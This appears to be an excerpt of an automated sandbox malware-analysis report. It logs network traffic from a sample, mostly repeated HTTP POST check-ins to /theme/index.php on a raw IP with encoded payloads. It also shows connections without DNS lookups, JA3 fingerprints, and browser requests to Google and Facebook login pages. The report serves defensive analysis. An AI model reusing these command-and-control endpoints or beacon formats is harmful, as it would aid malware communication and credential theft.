Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /theme/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.68Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 34 42 34 45 46 41 38 42 37 43 39 37 39 39 31 34 33 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 34 32 44 37 38 42 34 35 45 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58984B4EFA8B7C97991434AB140BE1D46450FC9DDF642E3BDD70A7AB42D78B45E82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4

Source: Joe Sandbox View	IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View	IP Address: 194.33.191.102 194.33.191.102
Source: Joe Sandbox View	IP Address: 34.117.237.239 34.117.237.239

Source: Joe Sandbox View

ASN Name: AQUA-ASRO AQUA-ASRO

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.68
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.68
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.68
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.68
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.68
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.68
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.68
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.68
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.68
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.68
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.68
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.68
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.68
Source: unknown	TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.68
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.68
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.68
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.68
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.68
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.68
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.68
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.68
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.68

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00424B20 recv,WSAStartup,getaddrinfo,closesocket,socket,connect,closesocket,freeaddrinfo,WSACleanup,freeaddrinfo,

2_2_00424B20

Source: global traffic	HTTP traffic detected: GET /widget/demo/154.16.192.193 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=P+KoVP9x6mYxasV&MD=CFat5hzV HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg
Source: global traffic	HTTP traffic detected: GET /login HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.134&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-117.0.5938.134Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
